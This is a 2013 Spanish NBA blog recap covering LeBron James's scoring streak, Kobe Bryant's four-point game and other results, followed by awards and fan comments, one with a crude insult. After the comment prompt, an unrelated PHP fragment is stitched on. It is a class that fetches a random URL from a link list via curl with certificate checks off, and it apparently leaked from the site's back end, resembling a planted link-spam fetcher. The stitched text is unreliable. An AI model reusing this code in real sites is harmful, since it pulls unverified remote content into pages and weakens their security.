La Crónica: El rey implacable

13 de February de 2013 por Pop

LeBron James sigue haciendo historia y anoche contra Portland se convirtió  en el primer jugador de la NBA en lograr más de 30 puntos en 6 partidos consecutivos con un acierto superior al 60%. La anterior racha estaba en manos de dos jugadores con sabor a añejo: Moses Malone y Adrian Dantley. Si al partido casi perfecto de King James (11/15, 6 rebotes, 9 asistencias, 3 robos, 2 tapones) se le unen sus compinches Bosh (32-11) y Wade (24-9-7) poco se puede hacer para prevenir la derrota. Aún así, los Blazers plantaron cara durante todo el partido, que se convirtió básicamente en un 3×3: Aldridge, Lillard y Matthews vendieron cara la derrota (104-117), llegando a estar el partido empatado a falta de 5 minutos.

También pudimos presenciar  otro hito casi histórico en Los Angeles, aunque en este caso negativo: el nefasto partido de Kobe Bryant que anotó 4 puntos (1/8) y perdió 8 balones en 35 minutos de juego. Es la anotación jugando más de 25 minutos más baja de toda su carrera. Pese a este dato, los Lakers ganaron a los Suns (85-91) gracias a una buena aportación colectiva y con un Howard particularmente brillante (19 puntos y 18 rebotes). Buena la actitud de Kobe renunciando al tiro para involucrar a sus compañeros, terminando con 9 asistencias. Por el equipo de Phoenix Beasley jugó su periódico buen partido desde el banquillo, mientras que Jermaine y Scola hicieron un buen trabajo bajo aros con 24 rebotes entre ambos, dada la desaparición de Gortat bajo la sombra de Howard.

En Utah, tropiezo de los Thunder y gran paso de los Jazz hacia los playoffs (94-109). Aunque Durant se fue con su habitual saco de puntos, estuvo sólo acompañado por Westbrook, y Oklahoma pagó caro su ineficacia en el rebote. Hasta 16 rebotes ofensivos permitieron de un total de 38 de los Jazz, mientras que entre Perkins e Ibaka recogieron la miserable cifra de 4 rebotes. Buen partido de Millsap y Jefferson, y el banquillo aportando 47 puntos. 

Los que no levantan cabeza son los Warriors, quienes tras su espléndido comienzo de año encadenan su 5ª derrota consecutiva, esta vez ante los Rockets. A Houston es difícil plantarle cara en partidos rápidos buscando 100 tiros y anotaciones altas, que es justo lo que se dio anoche (116-107). 7 jugadores de los Rockets acabaron por encima de los 10 puntos, con Harden liderando la anotación con 27. Por parte de Golden State, los 71 puntos anotados por el tridente Thompson-Curry-Jack fueron insuficientes, con un Lee particularmente flojo en labores de ataque.

Todo lo contrario pasa con Toronto, que siguen con su buena cara tras la llegada de Gay y ayer se cargaron a los difíciles Nuggets, que, eso sí, no pudieron contar con Gallinari, Iguodala ni Wilson Chandler. Buen rendimiento de De Rozan y del propio Rudy Gay que consiguió la canasta ganadora a falta de 5 segundos tras un partido muy igualado en casi todo momento. Por parte de Denver, enorme partido de Lawson (29-9), apoyado por Faried y un sorprendente Randolph con su mejor partido de la temporada (108-109).

Por último, nuevo balón de oxígeno y tercera victoria seguida de los Grizzlies (101-108), esta vez ante los Kings. Liderados por un gran Marc Gasol (24-12) y con un 55% de acierto en el tiro, los ositos tuvieron casi todo el tiempo el partido bajo su control, con Allen y Conley muy acertados desde el perímetro. En Memphis parecen haber encontrado un inesperado filón ofensivo en Tony Allen, supliendo el bajo rendimiento en ataque que está mostrando últimamente Randolph. Cousins y Evans fueron los mejores por parte de Sacramento.

PREMIOS

MVP: Ya nos quedamos sin palabras para describir la temporada de Lebron James. Otro partido con un mínimo 30 puntos y más de un 60% de acierto en el tiro y van 6 consecutivos. Ayer le acompañó Chris Bosh con 32 puntos y 11 rebotes.

Rookie: Damian Lillard dejó su tarjeta de presentación ante Lebron y compañía. El de los Blazers fue el mejor de los suyos con 33 puntos.

Sorpresa: El “todopoderoso” Jermaine O’Neal consiguió un doble frente los Lakers con 12 puntos y 13 rebotes. Además puso 5 pinchos de merluza como regalo.

Decepción: Kobe Bryant anotó sólo 4 puntos, su peor marca como titular jugando más de 11 minutos. Anotó sólo 1 un tiro de los 8 que lanzó y perdió 8 balones. Kevin Martin y Andrea Bargnani tampoco jugaron sus mejores partidos.

Esfuerzo en vano: Kevin Durant jugó a nivel MVP pero se les escapó la victoria. Sus 33 puntos, 6 rebotes, 5 asistencias y 4 robos se toparon con la fortaleza de los Jazz.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

8 comentarios a esta entrada

  1. busky23 dice:
    #1

    Nunca había visto semejante salvajada…King James más King que nunca…
    Tiros de Campo totales: 66/92=71,7% Últimos 80tiros 60/80=75% Canastas en la pintura: 46/54=85%.
    El MVP se va aclarando y de que manera…

      Citar

  2. Esteban dice:
    #2

    mmmmmm que buena pinta tienen los raptors, si que han mejorado y mucho con la llegada de gay y el regreso de valanciunas y barngani, el primero sobre todo

    si recuperan a bargnani en nivel, pueden ser equipo de PO el proximo año si no traspasan a sus mejores hombres

    para salir del impuesto de lujo deberan amnistiar a kleiza y conseguir un trade que asuma el contrato de amir jhonson

      Citar

  3. Ruxixón dice:
    #3

    Como ha dicho LeBron James en su twitter: “I’m not MJ,I’m LJ” camino de dejar su legado a la altura de los más grandes.

    Por cierto,uno de los pocos nombres prometedores para el próximo draft,Noel,pívot defensivo,se ha lesionado la rodilla,la lamentablemente famosa ACL,así que uno que se cae de la próxima clase,que si ya de por si pintaba cortita ahora más.

      Citar

  4. GreenPride dice:
    #4

    Espectacular el rendimiento de LeBron. El Big Three de Miami se ha puesto manos a la obra afinando ya su forma y ahora mismo parecen imparables. El Rey se acerca a un nuevo y merecedísimo MVP.
    El que le podría discutir algo el MVP, Kevin Durant, sigue también a un nivel fenomenal. Ayer, él y Westbrook firmaron un partidazo pero su equipo perdió ante el increíble dominio del rebote de los Jazz y el gran partido de sus reservas. ¡Que difícil es ganar en Salt Lake!
    El otro rival de los Lakers también les sigue complicando su intento de acceder a PO ganando en casa de unos Warriors que definitivamente parecen perder fuelle ante la falta de puntos de sus interiores (mal partido de Lee, Bogut y Landry).
    Esto hace que los Lakers sigan viendo negro su futuro en PO ya que a pesar de su victoria ante unos deshauciados Suns siguen muy lejos de los 2 equipos que marcan los PO en el Oeste.
    Del resto Memphis aprovecha la mala racha de Warriors y la segunda derrota consecutiva de los Nuggets para afianzarse de momento en el 4º puesto gracias a un Marc Gasol fenomenal. Parece que se van haciendo a jugar sin un Rudy Gay que de momento está haciendo un gran papel en Toronto.

      Citar

  5. Jose Luis dice:
    #5

    Turkoglu sancionado 20 partidos por dopaje

      Citar

  6. Denise dice:
    #6

    Jose Luis:
    Turkoglu sancionado 20 partidos por dopaje

    Yo sospechaba de su dopaje ya que no era normal que esta temporada el hijo puta estuviera promediando 35 puntos, 14 rebotes y 8 asistencias por partido.

      Citar

  7. Jose Luis dice:
    #7

    jajajaja mira, le viene genial a Orlando. Se ahorran 2 millones aprox.

      Citar

  8. Esteban dice:
    #8

    Jose Luis:
    Turkoglu sancionado 20 partidos por dopaje

    cuando parecia que TURKOGLU no podia arruinar aun mas su carrera, ZAS, sale de la nada con ESTO

    una genialidad TOTAL de la directiva de los SUNS que decidieron no renovar hace unos años a AMARE, y en su lugar gastar ese dinero en TOKOGLU, WARRIK y FRYE,
    ahora las apuestas:

    CON CUAL DE TODOS LA CAGO MAS?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>